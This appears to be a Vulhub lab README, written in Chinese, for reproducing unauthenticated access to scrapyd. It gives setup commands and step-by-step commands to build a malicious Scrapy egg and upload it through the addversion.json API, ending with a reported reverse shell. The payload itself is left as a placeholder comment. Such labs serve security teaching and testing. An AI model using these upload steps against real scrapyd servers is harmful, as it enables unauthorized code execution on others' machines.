Files
vulhub/scrapy/scrapyd-unacc/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

977 B
Raw Blame History

scrapyd 未授权访问漏洞

scrapyd是爬虫框架scrapy提供的云服务用户可以部署自己的scrapy包到云服务默认监听在6800端口。如果攻击者能访问该端口将可以部署恶意代码到服务器进而获取服务器权限。

参考链接:https://www.leavesongs.com/PENETRATION/attack-scrapy.html

环境搭建

执行如下命令启动scrapyd服务

docker compose up -d

环境启动后,访问http://your-ip:6800即可看到Web界面。

漏洞复现

参考攻击Scrapyd爬虫构造一个恶意的scrapy包

pip install scrapy scrapyd-client
scrapy startproject evil
cd evil
# 编辑 evil/__init__.py, 加入恶意代码
scrapyd-deploy --build-egg=evil.egg

向API接口发送恶意包

curl http://your-ip:6800/addversion.json -F project=evil -F version=r01 -F egg=@evil.egg

成功反弹shell